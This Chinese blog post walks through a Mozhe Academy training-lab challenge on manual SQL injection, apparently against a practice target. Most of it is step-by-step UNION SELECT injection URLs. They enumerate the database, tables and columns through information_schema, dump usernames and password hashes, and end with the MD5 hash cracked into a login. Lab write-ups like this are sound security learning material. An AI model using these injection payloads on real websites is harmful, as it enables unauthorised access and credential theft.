墨者学院 SQL过滤字符后手工注入漏洞测试(第3题)

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/a519395243/article/details/85157121

 手工注入 墨者学院 SQL过滤字符后手工注入漏洞测试(第3题)

使用sqlmap 跑,跑不出表名,所以手工注入

点击进去靶场

域名url为:   http://219.153.49.228:41774/new_list.php?id=1

第一步:判断是否有注入点    

http://219.153.49.228:41774/new_list.php?id=1'    出错

http://219.153.49.228:41774/new_list.php?id=1' and 1=1--+   正常   (--+ :  --为注射后面,忽略引号,+为空格)

http://219.153.49.228:41774/new_list.php?id=1‘ and 1=2 --+  为空

判断存在注入点

第二步:判断字段数

http://219.153.49.228:41774/new_list.php?id=1' order by 7 --+   正常

http://219.153.49.228:41774/new_list.php?id=1' order by 8 --+   出错

确定字段数为 7

第三步:判断数据库名

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,2,3,4,5,6,7--+   确认注入显示位置

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,database(),3,4,5,6,7--+   显示数据库名

判断数据库名为 min_ju4t_mel1i

第四步: 爆表名

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema='min_ju4t_mel1i'--+

表名为 (@dmin9_td4b}

第五步:爆列表信息

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='(@dmin9_td4b}'--+

列表名为 id,username,password,status

第六步:爆列表内 登录信息

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,group_concat(username),group_concat(password),group_concat(status),5,6,7 from `(@dmin9_td4b}`--+

选状态为1的登录帐号和密码

既 登录帐号为 mozhe3 ,密码为 210ed648a5d14eb573b8755ceb1af330

密码md5解密 为 807362

猜你喜欢

转载自blog.csdn.net/a519395243/article/details/85157121
今日推荐